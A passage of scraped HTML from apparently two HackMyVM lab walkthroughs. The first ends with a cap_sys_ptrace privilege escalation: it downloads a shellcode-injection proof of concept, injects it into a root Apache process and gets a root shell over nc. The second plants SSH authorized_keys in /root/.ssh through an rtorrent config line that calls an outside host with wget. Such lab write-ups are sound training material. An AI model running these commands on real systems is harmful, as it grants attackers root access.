 /usr/bin/python2.7 = cap_sys_ptrace+ep
 /usr/bin/traceroute6.iputils = cap_net_raw+ep
 /usr/bin/ping = cap_net_raw+ep
 /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
 /usr/bin/mtr-packet = cap_net_raw+ep
 ...</code></pre>
<blockquote>
<p>Reference: <a href="https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc">https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc</a></p>
</blockquote>
<p>Download the POC and upload to server.</p>
<pre><code class="language-bash"> wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py</code></pre>
<p>Choose a root process to be injected.</p>
<pre><code class="language-bash"> saket@ubuntu:~$ ps aux|grep root
 ...
 root         935  0.0  0.4 199776 19968 ?        Ss   12:54   0:00 /usr/sbin/apache2 -k start
 ...</code></pre>
<p>Run the POC, then check port.</p>
<p>```bash
saket@ubuntu:~$ python2.7 inject.py 935
python2.7 inject.py 935
Instruction Pointer: 0x7fd118b560daL
Injecting Shellcode at: 0x7fd118b560daL
Shellcode Injected!!
Final Instruction Pointer: 0x7fd118b560dcL
saket@ubuntu:~$ ss -tnlp
ss -tnlp
State     Recv-Q    Send-Q        Local Address:Port       Peer Address:Port    Process                 ...
LISTEN    0         0                   0.0.0.0:5600            0.0.0.0:*                                ...</p>
<pre><code>
Connect port 5600 and get root shell.

```bash
 ~ nc 192.168.33.144 5600              
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Warez Simple Walkthrough

HackMyVm Warez Simple Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Warez

Two key steps.

First step, use Aria2 WebUI to download authorzied_keys into /home/carolina/.ssh, then we can login ssh as user carolina.

image-20210901220643988.png

Second step, use rtorrent to download authorzied_keys again into /root/.ssh.

 carolina@warez:~$ tail .rtorrent.rc
 # SCGI Connectivity (for alternative rtorrent interfaces, XMLRPC)
 # Use a IP socket with scgi_port, or a Unix socket with scgi_local.
 # schedule can be used to set permissions on the unix socket.
 #
 #network.scgi.open_port = "127.0.0.1:5000"
 #network.scgi.open_local = (cat,(session.path),/rpc.sock)
 #schedule2 = socket_chmod, 0, 0, "execute.nothrow=chmod,770,(cat,(session.path),/rpc.sock)"
 execute.throw = mkdir,/root/.ssh
 execute.throw = wget,http://192.168.56.150/authorized_keys,-O,/root/.ssh/authorized_keys